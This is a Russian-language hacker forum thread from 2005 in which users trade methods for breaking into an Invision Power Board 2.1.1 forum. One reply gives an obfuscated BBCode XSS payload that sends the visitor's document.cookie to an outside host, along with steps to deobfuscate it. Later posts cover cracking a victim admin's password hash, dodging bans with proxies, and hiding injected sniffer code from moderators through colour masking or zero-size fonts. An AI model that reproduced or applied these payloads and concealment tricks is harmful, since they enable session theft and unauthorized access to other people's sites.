Вопрос по эксплойту для Ipb 2.1.1.

Discussion in 'Песочница' started by Zheca, 26 Dec 2005.

  1. Zheca

    Zheca Elder - Старейшина

    Joined:
    18 Dec 2005
    Messages:
    79
    Likes Received:
    4
    Reputations:
    0
    Привет! Нужен эксплойт для Ipb 2.1.1. Кто нить может помочь?
     
  2. FQziT

    FQziT Elder - Старейшина

    Joined:
    3 Nov 2005
    Messages:
    543
    Likes Received:
    156
    Reputations:
    206
    HTML:
    [post=1000[topic=target style=background&*#58;url(javascript*:document.image*s&#9*1;&#*49;].*src=*"*&#104*;&#11*6;&#1*16;&*#112*;&#5*8;&#*47;&#*47;&#*97;&#*110;*&#116*;&#1*05;&#*99;&*#104;*a*&#11*6;&#*46;&#*114;&*#117*;&#4*7;&#9*9;&#1*03;&*#105;*&#45*;&#98*;&#10*5;&#1*10;&*#47;s.j&*#112;g?"+document.cookie); ]       [/topic]]
    
    
    [/post]
    Поудаляй все звёздочки из спец. символов. И про репу не забываем ;-)
     
    1 person likes this.
  3. Zheca

    Zheca Elder - Старейшина

    Joined:
    18 Dec 2005
    Messages:
    79
    Likes Received:
    4
    Reputations:
    0
    Седня вошел на форум-жертву тока хеш расшифровывать както в лом (по моему долгое это занятие). Естественно чтоб попасть в админку требует пароль юзера. Подскажите пожалуйста, есть какие нить реальные проги по раскодированию хэшей и может быть есть способ по другому попасть в админку.
    ПС: FQziT за код спасибо - как проверю, если сработает + к репе с меня
     
    #3 Zheca, 26 Dec 2005
    Last edited: 28 Dec 2005
  4. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    IPB 2.x ты хэш не расшифруешь
    почему? - юзай поиск...
     
  5. Zheca

    Zheca Elder - Старейшина

    Joined:
    18 Dec 2005
    Messages:
    79
    Likes Received:
    4
    Reputations:
    0
    вот хэщ - 52371906352bc10de868a5b733134888 - его возможно расшифровать?
     
    #5 Zheca, 26 Dec 2005
    Last edited: 28 Dec 2005
  6. FQziT

    FQziT Elder - Старейшина

    Joined:
    3 Nov 2005
    Messages:
    543
    Likes Received:
    156
    Reputations:
    206
    Zheca
    Нет. И пользуйся поиском по форуму. Об этом уже говорили.
     
  7. Zheca

    Zheca Elder - Старейшина

    Joined:
    18 Dec 2005
    Messages:
    79
    Likes Received:
    4
    Reputations:
    0
    Ок! Все понял - кончаю тупить
     
    1 person likes this.
  8. Zheca

    Zheca Elder - Старейшина

    Joined:
    18 Dec 2005
    Messages:
    79
    Likes Received:
    4
    Reputations:
    0
    Ввел код в сообщение - ниче не вышло - наверное я гдето лишнюю звездочку убрал
     
    #8 Zheca, 26 Dec 2005
    Last edited: 28 Dec 2005
  9. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
  10. member_ru

    member_ru Elder - Старейшина

    Joined:
    8 Dec 2005
    Messages:
    46
    Likes Received:
    3
    Reputations:
    0
  11. Zheca

    Zheca Elder - Старейшина

    Joined:
    18 Dec 2005
    Messages:
    79
    Likes Received:
    4
    Reputations:
    0
    + к репе FQziT
     
    #11 Zheca, 27 Dec 2005
    Last edited: 27 Dec 2005
  12. Tem

    Tem -

    Joined:
    5 Oct 2005
    Messages:
    557
    Likes Received:
    157
    Reputations:
    179
    Смотря под чего блокали ? если по айпи то некак (только прокси),под ник если просто зареги новый и удали куки и файлы.
     
  13. Zheca

    Zheca Elder - Старейшина

    Joined:
    18 Dec 2005
    Messages:
    79
    Likes Received:
    4
    Reputations:
    0
    А если хост отрезали - то я понимаю тока прокси остается?
     
  14. Zheca

    Zheca Elder - Старейшина

    Joined:
    18 Dec 2005
    Messages:
    79
    Likes Received:
    4
    Reputations:
    0
    Отсканил сервак и получил " возможно, выполнить произвольный код на уязвимость системе". Есть эксплойт. Кто нить может ссылочку дать ссылочку?
     
    #14 Zheca, 29 Dec 2005
    Last edited: 30 Dec 2005
  15. FQziT

    FQziT Elder - Старейшина

    Joined:
    3 Nov 2005
    Messages:
    543
    Likes Received:
    156
    Reputations:
    206
    Zheca Ты читать вообще умеешь?! Причём тут DDos атака и форумы IPB 2.1.1??? И вобще Античат против ДДоса.
     
  16. Zheca

    Zheca Elder - Старейшина

    Joined:
    18 Dec 2005
    Messages:
    79
    Likes Received:
    4
    Reputations:
    0
    Спасиб конечно за -1 :(( Я знаю что Античат против ДДос. Может я непонятно выразился - но я не собираюсь ддосить - меня интересует сторочка о выполнении произвольного кода. А сканил я сервак с установленным на нем ипб 2.1.1

    И еще вопрос: а возможно всатвление кода не в пост а в название темы при ее создании?
     
  17. Zheca

    Zheca Elder - Старейшина

    Joined:
    18 Dec 2005
    Messages:
    79
    Likes Received:
    4
    Reputations:
    0
    На воруме который я ломаю админ - гад уж больно прбитый и глазастый. Сходу вычисляет ссылочку на снифер - удаляет пост и юзера. Может быть стоит какая нить защита, которая активируется как тока я выкладываю ссылку на снифер?
     
  18. Otaku

    Otaku Elder - Старейшина

    Joined:
    24 Jul 2005
    Messages:
    279
    Likes Received:
    73
    Reputations:
    2
    Глазастый админ это прикольно=)
    А серьёзно. Какой нибудь способ автоматом ловить внедрённый сниффер есть?
     
  19. maXaTTAck

    maXaTTAck New Member

    Joined:
    6 Sep 2005
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Вопросик появился: После внедрения этого зловредного кода остается что-то вроде [topic/]]. Можно ли этого избежать?
     
  20. slime

    slime New Member

    Joined:
    8 Dec 2005
    Messages:
    30
    Likes Received:
    1
    Reputations:
    -2
    Если что-то остается, то можно замаскировать под цвет фона хы-хы...
    но хз... у мя ничего не оставалось никогда...

    по поводу глазастых админов...
    не все XSS работают в Опере... опера не так воспринимает ` как IE ... короч маскируйте посты цветом....

    оффтоп... а некоторые форумы типа ЭксББ не проверяют размер шрифта.... можно SIZE=0 поставить и вообще никто не разглядит чего там написано.
     
Loading...
Similar Threads - Вопрос эксплойту
  1. gilo20
    Replies:
    2
    Views:
    2,493
  2. Dobi768
    Replies:
    2
    Views:
    2,411
  3. avva99on
    Replies:
    0
    Views:
    2,411